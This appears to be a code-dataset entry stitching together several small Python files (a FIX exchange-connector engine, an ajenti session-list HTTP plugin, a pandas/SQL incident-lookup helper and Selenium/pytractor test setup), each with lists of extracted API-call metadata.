] | [((773, 786), 'putil.rabbitmq.rabbitmqadmin.make_parser', 'make_parser', ([], {}), '()\n', (784, 786), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((4489, 4518), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (4499, 4518), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((5102, 5131), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (5112, 5131), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((5787, 5816), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (5797, 5816), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((6209, 6238), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (6219, 6238), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((6361, 6390), 'simplejson.loads', 'simplejson.loads', (['output_json'], {}), '(output_json)\n', (6377, 6390), False, 'import simplejson\n'), ((4452, 4472), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (4463, 4472), False, 'import shlex\n'), ((5065, 5085), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (5076, 5085), False, 'import shlex\n'), ((5750, 5770), 'shlex.split', 'shlex.split', (['cmd_str'], {}), '(cmd_str)\n', (5761, 5770), False, 'import shlex\n'), ((6171, 6192), 'shlex.split', 'shlex.split', (['list_str'], {}), '(list_str)\n', (6182, 6192), False, 'import shlex\n'), ((7041, 7070), 'putil.rabbitmq.rabbitmqadmin.Management', 'Management', (['options', 'args[1:]'], {}), '(options, args[1:])\n', (7051, 7070), False, 'from putil.rabbitmq.rabbitmqadmin import Management, make_parser, LISTABLE, DELETABLE\n'), ((6989, 7012), 'shlex.split', 'shlex.split', (['delete_cmd'], {}), '(delete_cmd)\n', (7000, 7012), False, 'import shlex\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ExchangeConnector fixEngine
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import asyncio
import simplefix
import threading
import logging
import time
import sys
import configparser
from fixClientMessages import FixClientMessages
from connectionHandler import FIXConnectionHandler, SocketConnectionState
class FixEngine(FIXConnectionHandler):
def __init__(self, config, reader, writer, messageListener):
FIXConnectionHandler.__init__(self, config, reader, writer, messageListener)
self._config = config
self._logout = False
self._engineLogger.info(f"Socket Connection Open to {config['SocketHost']}:{config['SocketPort']}")
self.clientMessage = FixClientMessages(config['SenderCompID'], config['TargetCompID'], config['SenderPassword'], config['BeginString'], config.getint('HeartBeatInterval'))
asyncio.ensure_future(self._handleEngine())
def getConnectionState(self):
return self._connectionState
async def _sessionMessageHandler(self, message: simplefix.FixMessage) -> bool:
""" Handle Session Message."""
assert isinstance(message, simplefix.FixMessage)
# NEED TO ADD HANDLING OF BUSINESS REJECTS
msgType = message.get(simplefix.TAG_MSGTYPE)
if msgType == simplefix.MSGTYPE_LOGON: # Handle logon
if self._connectionState == SocketConnectionState.LOGGED_IN:
self._engineLogger.warning(f"{self._config['SenderCompID']} already looged in -> Ignoring Login Request.")
else:
self._connectionState = SocketConnectionState.LOGGED_IN
self._engineLogger.info(f"{self._config['SenderCompID']} session -> LOGON")
self._config['HeartBeatInterval'] = str(message.get(simplefix.TAG_HEARTBTINT).decode())
return True
elif self._connectionState == SocketConnectionState.LOGGED_IN:
if msgType == simplefix.MSGTYPE_TEST_REQUEST: # Send test heartbeat when requested
msg = self.clientMessage.sendHeartbeat()
msg.append_pair(simplefix.TAG_TESTREQID, message.get(simplefix.TAG_TESTREQID))
await self.sendMessage(msg)
return True
elif msgType == simplefix.MSGTYPE_LOGOUT: # Handle Logout
self._connectionState = SocketConnectionState.LOGGED_OUT
self._engineLogger.info(f"{self._config['SenderCompID']} session -> LOGOUT")
self.handleClose()
return True
elif msgType == simplefix.MSGTYPE_HEARTBEAT:
msg = self.clientMessage.sendHeartbeat()
msg.append_pair(simplefix.TAG_TESTREQID, message.get(simplefix.TAG_TESTREQID))
await self.sendMessage(msg)
return True
elif message.get(simplefix.TAG_RESETSEQNUMFLAG) == simplefix.RESETSEQNUMFLAG_YES: # If ResetSeqNum = Y Then Reset sequence
self._session.resetSeqNo()
self._engineLogger.info("Resetting Sequence Number to 1")
return True
else:
return False
else:
self._engineLogger.warning(f"Cannot process message. {self._config['SenderCompID']} is not logged in.")
return False
async def _handleEngine(self):
await self.logon()
while self._connectionState != SocketConnectionState.DISCONNECTED:
if self._connectionState != SocketConnectionState.LOGGED_OUT:
await self.readMessage()
await self.expectedHeartbeat(self._config.getint('HeartBeatInterval'))
else:
await self.logon()
class FIXClient:
def __init__(self, configFile, gateway, listener):
self._config = self.loadConfig(configFile, gateway)
self._reader = None
self._writer = None
self._client = None
self._messageListener = listener
async def startClient(self, loop):
""" Creates Socket Connection and Runs Main Loop."""
self._reader, self._writer = await asyncio.open_connection(self._config["SocketHost"], self._config["SocketPort"], loop=loop)
self._connectionState = SocketConnectionState.CONNECTED
self._client = FixEngine(self._config, self._reader, self._writer, self._messageListener)
def loadConfig(self, filePath, gateway):
parser = configparser.SafeConfigParser()
parser.read(filePath)
if parser.has_section(gateway):
return parser[gateway]
else:
raise Exception(f"{gateway} section not found in configuration file {filePath}")
def getClient(self):
return self._client | [
"configparser.SafeConfigParser",
"asyncio.open_connection",
"connectionHandler.FIXConnectionHandler.__init__"
] | [((1479, 1555), 'connectionHandler.FIXConnectionHandler.__init__', 'FIXConnectionHandler.__init__', (['self', 'config', 'reader', 'writer', 'messageListener'], {}), '(self, config, reader, writer, messageListener)\n', (1508, 1555), False, 'from connectionHandler import FIXConnectionHandler, SocketConnectionState\n'), ((5465, 5496), 'configparser.SafeConfigParser', 'configparser.SafeConfigParser', ([], {}), '()\n', (5494, 5496), False, 'import configparser\n'), ((5149, 5244), 'asyncio.open_connection', 'asyncio.open_connection', (["self._config['SocketHost']", "self._config['SocketPort']"], {'loop': 'loop'}), "(self._config['SocketHost'], self._config[\n 'SocketPort'], loop=loop)\n", (5172, 5244), False, 'import asyncio\n')] |
from jadi import component
from aj.api.http import url, HttpPlugin
from aj.auth import authorize
from aj.api.endpoint import endpoint, EndpointError
import aj
import gevent
@component(HttpPlugin)
class Handler(HttpPlugin):
def __init__(self, context):
self.context = context
@url(r'/api/session_list/list')
@endpoint(api=True)
def handle_api_list_sessions(self, http_context):
if http_context.method == 'GET':
self.context.worker.update_sessionlist()
gevent.sleep(1)
return aj.sessions
| [
"gevent.sleep",
"aj.api.http.url",
"jadi.component",
"aj.api.endpoint.endpoint"
] | [((176, 197), 'jadi.component', 'component', (['HttpPlugin'], {}), '(HttpPlugin)\n', (185, 197), False, 'from jadi import component\n'), ((295, 324), 'aj.api.http.url', 'url', (['"""/api/session_list/list"""'], {}), "('/api/session_list/list')\n", (298, 324), False, 'from aj.api.http import url, HttpPlugin\n'), ((331, 349), 'aj.api.endpoint.endpoint', 'endpoint', ([], {'api': '(True)'}), '(api=True)\n', (339, 349), False, 'from aj.api.endpoint import endpoint, EndpointError\n'), ((510, 525), 'gevent.sleep', 'gevent.sleep', (['(1)'], {}), '(1)\n', (522, 525), False, 'import gevent\n')] |
import pandas as pd
import os
#opt = itertools.islice(ls, len(ls))
#st = map(lambda x : )
def parsecode(txt):
df = pd.read_csv(os.getcwd() + '\\OMDB.csv')
ls = df['Code'].to_list()
code = []
q = 0
for i in range(len(ls)):
text = txt
if ls[i] in text:
n = text.find(ls[i])
st = text[n:n+7]
code.append(st)
txt = txt.replace(ls[i],'')
q = q + 1
else:
if q == 0:
return ''
else:
return code
def qry_by_code(code, tbl = None, col = None):
if tbl is None and col is None:
a1 = "select Incident_Notification,Down_Time,Up_Time,Major_Cause,Action_Taken,Link_ID_Site_ID,Incident_ID from incident_tracker_v2 where ("
a2 = " No_of_2G_Impacted_sites Like '%" + code + "%' or No_of_3G_Impacted_sites like '%" + code + "%' or No_of_4G_Impacted_Sites like '%" + code + "%' or Incident_Notification Like '%" + code
a3 = "%') order by Down_Time desc"
aa = a1 + a2 + a3
return aa
else:
return ""
def codechk(txt):
rs = parsecode(txt.upper())
st = 0
print('ret val', rs)
if len(rs) == 1:
code = rs[0]
rn = 0
try:
cd = int(code[6:7])
qry = qry_by_code(code)
conn = pyodbc.connect(soc)
df = pd.read(qry, con = conn)
if df.shape[0] != 0:
if df.shape[0] > 3:
st = "last 3 incident out of " + df.shape[0]
rn = 3
else:
st = "incident found " + df.shape[0] + chr(10)
rn = df.shape[0]
for i in range(rn):
tmp = chr(10)
for j in df:
tmp = tmp + chr(10) + df.loc[i,j]
else:
st = st + chr(10) + str(i) + tmp
except:
print('not code')
return st
else:
return st
| [
"pandas.read",
"os.getcwd"
] | [((135, 146), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (144, 146), False, 'import os\n'), ((1379, 1401), 'pandas.read', 'pd.read', (['qry'], {'con': 'conn'}), '(qry, con=conn)\n', (1386, 1401), True, 'import pandas as pd\n')] |
import socket
import unittest
from eats.webdriver import PytractorWebDriver
from eats.tests.common import SimpleWebServerProcess as SimpleServer
def _get_local_ip_addr():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com",80))
local_ip_addr = s.getsockname()[0]
s.close()
return local_ip_addr
class PytractorTestBaseSetup(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.process = SimpleServer()
cls.process.run()
def setUp(self):
self.base_url = "http://{}:{}".format(_get_local_ip_addr(), SimpleServer.PORT)
self.driver = self.get_driver()
self.driver.ignore_synchronization = False
@classmethod
def tearDownClass(cls):
cls.process.stop()
def tearDown(self):
self.driver.quit()
class FirefoxRemoteWebDriverTest(object):
def get_driver(self):
return PytractorWebDriver(
test_timeout=3000,
command_executor='http://{}:4444/wd/hub'.format(_get_local_ip_addr()),
desired_capabilities={'browserName': 'firefox', 'version': '', 'platform': 'ANY'}
)
class ChromeRemoteWebDriverTest(object):
def get_driver(self):
return PytractorWebDriver(
test_timeout=3000,
command_executor='http://{}:4444/wd/hub'.format(_get_local_ip_addr()),
desired_capabilities={'browserName': 'chrome', 'version': '', 'platform': 'ANY'}
) | [
"eats.tests.common.SimpleWebServerProcess",
"socket.socket"
] | [((180, 228), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (193, 228), False, 'import socket\n'), ((454, 468), 'eats.tests.common.SimpleWebServerProcess', 'SimpleServer', ([], {}), '()\n', (466, 468), True, 'from eats.tests.common import SimpleWebServerProcess as SimpleServer\n')] |